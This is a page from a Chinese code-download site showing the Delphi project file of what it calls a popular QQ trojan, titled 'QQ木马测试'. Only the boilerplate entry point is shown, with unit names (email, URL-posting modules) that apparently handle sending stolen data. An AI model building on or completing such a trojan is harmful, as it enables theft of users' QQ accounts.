⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 zhongyu.dpr

📁 这是目前很流行的QQ木马 的代码 现在 这个很使用的
💻 DPR
字号:
program zhongyu;
{$R '..\exe\zg.res' '..\exe\zg.txt'}
//{$R '..\res\click.res' '..\res\click.txt'}
//{$R '..\res\formload.res' '..\res\formload.txt'}
uses
  Forms,
  Unit1 in 'Unit1.pas' {Form1},
  eMail66 in 'eMail66.pas',
  tonghan in 'tonghan.pas',
  postURLpas in 'postURLpas.pas',
  UrlPost in 'UrlPost.pas';

{$R *.res}

begin
  application.Title:= 'QQ木马测试';
  Application.Initialize;
  Application.CreateForm(TForm1, Form1);
  Application.Run;
end.

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -